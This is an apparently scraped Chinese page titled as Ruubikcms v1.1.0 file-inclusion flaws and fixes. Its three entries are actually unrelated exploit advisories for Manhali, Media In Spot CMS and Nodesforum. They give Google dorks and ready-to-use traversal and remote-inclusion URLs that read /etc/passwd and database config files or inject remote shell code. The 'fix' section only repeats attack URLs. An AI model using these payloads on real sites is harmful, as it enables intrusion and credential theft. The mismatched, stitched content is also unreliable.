Ruubikcms v 1.1.0文件包含缺陷及修复(精选3篇)
篇1:Ruubikcms v 1.1.0文件包含缺陷及修复
标题Manhali v1.8 Local File Inclusion Vulnerability
作者: L0n3ly-H34rTl0n3ly_h34rt@hotmail.com
程序开发: www.manhali.com/
下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
影响版本: 1.8 (或许老版也受影响,未检查)
测试系统: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
篇2:Ruubikcms v 1.1.0文件包含缺陷及修复
#Date : May,16
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
篇3:Ruubikcms v 1.1.0文件包含缺陷及修复
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.cache/.$_nodesforum_db_table_name_modifier._3rd_party_limits.php;
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time-(24*3600*14)))
{include($limits_cache_url);}
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
【Ruubikcms v 1.1.0文件包含缺陷及修复】相关文章:
Media In Spot CMS本地文件包含缺陷及修复08-13
ECMall本地文件包含漏洞05-14
ECSHOP跨站+后台文件包含=Getshell漏洞预警08-29
修复和保护CAD文件的方法06-29
时政及文件07-30
公司资质文件及重要文件管理制度06-07
章程及任职文件05-24
时政及文件范文05-21
Python实现给文件添加内容及得到文件信息的方法05-02
文件筐试题及答案07-18